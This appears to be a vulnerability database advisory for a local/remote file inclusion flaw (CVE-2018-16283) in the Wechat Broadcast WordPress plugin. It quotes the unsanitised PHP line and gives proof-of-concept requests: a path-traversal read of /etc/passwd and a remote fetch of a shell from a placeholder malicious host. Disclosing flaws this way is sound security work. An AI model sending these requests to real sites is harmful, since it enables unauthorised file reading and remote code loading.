Wechat Broadcast <= 1.2.0 - Local/Remote File Inclusion

Description

This bug was found in the file:

/wechat-broadcast/wechat/Image.php

echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');

The parameter "url" it is not sanitized allowing include local or remote
files

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

Proof of Concept

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=
http://malicious.url/shell.txt

Affects Plugin

wechat-broadcast

References

CVE	2018-16283
EXPLOITDB	45438
URL	https://seclists.org/fulldisclosure/2018/Sep/32

Classification

Type	LFI
OWASP Top 10	A1: Injection
CWE	CWE-22

Miscellaneous

Original Researcher	Manuel García Cárdenas
Submitter	Jonas Lejon
Submitter Website	https://wpscans.com
Submitter Twitter	@wpscans
Views	5911
Verified	No
WPVDB ID	9132

Timeline

Publicly Published	2018-09-19 (10 months ago)
Added	2018-09-24 (10 months ago)
Last Updated	2018-09-24 (10 months ago)